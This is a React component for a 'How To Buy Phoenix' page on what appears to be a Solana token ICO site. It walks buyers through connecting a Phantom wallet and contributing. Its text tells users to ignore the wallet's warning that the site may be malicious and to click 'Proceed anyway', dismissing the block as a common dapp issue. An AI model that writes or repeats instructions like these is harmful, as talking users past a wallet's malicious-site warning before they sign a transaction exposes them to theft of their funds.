


import DashboardLayout from "../../DashboardLayout"
import { lazy } from "react"
import { Suspense } from "react"
import { useWallet } from "@solana/wallet-adapter-react"
import AppLoader from "../../../../components/AppLoader/AppLoader"
import demo1 from '../../../../assets/images/demo1.jpg'
import demo2 from '../../../../assets/images/demo2.jpg'
import demo3 from '../../../../assets/images/demo3.jpg'
import { Link } from "react-router-dom"

// import ContributeWidget from '../SalePage/components/ContibuteWidget/ContibuteWidget'
// import WithdrawProfits from '../components/WithdrawProfits/WithdrawProfits'


export default function HowToBuy () {

const {connected} = useWallet()

return(
   <div className='w-full !h-full  shadow-xl  rounded-lg border-neutral-500/20 border    bg-black/80 backdrop-blur-lg p-5'>
              <div className='flex  flex-col justify-between items-center gap-5 h-full'>
                  <div className="flex w-full items-center justify-between">
                      <div className="grid gap-2">
                          <h1 className="heading-large">How To Buy Phoenix</h1>
                      </div>
  

                  </div>

                  <p>Simply Navigate to our ICO Page Connect you wallet and Insert your contribution amount then click contribute </p>
                    <img loading="lazy" src={demo1} alt="" className=" rounded border border-yellow-500/20" />
                  <p>Wallet window will appear you can ignore the warning and click "Proceed anyway" it's commun issue in dapps using phantom wallet which you can also see in this topic  </p>
                  <Link to={'https://solana.stackexchange.com/questions/17557/dapp-request-blocked-dapp-may-be-malicious'} rel="noopener noreferrer">https://solana.stackexchange.com</Link>

                    <img loading="lazy" src={demo2} alt="" className=" rounded border border-yellow-500/20" />
                  <p>Finally accept and click Yes confirm as follow , the transaction will be recorded and the tokens will be added to your account with Phase Bonus </p>
                    <img loading="lazy" src={demo3} alt="" className=" rounded border border-yellow-500/20" />
                  {/* <Navigation userData={userData} /> */}
                  <hr className='w-full border-neutral-500/20 ' />
                  {/* <CopyReferral userData={userData}/> */}
  
                  {/* <GiftCard /> */}
                  {/* <LastTransactions /> */}
                  {/* <DashboardTasks /> */}
                  <hr className='w-full border-neutral-500/20 ' />
                  {/* <Assistant /> */}
                  {/* <hr className='w-full border-neutral-500/20 ' /> */}
                  {/* <TokenInfos /> */}
              </div>
          </div>
)

}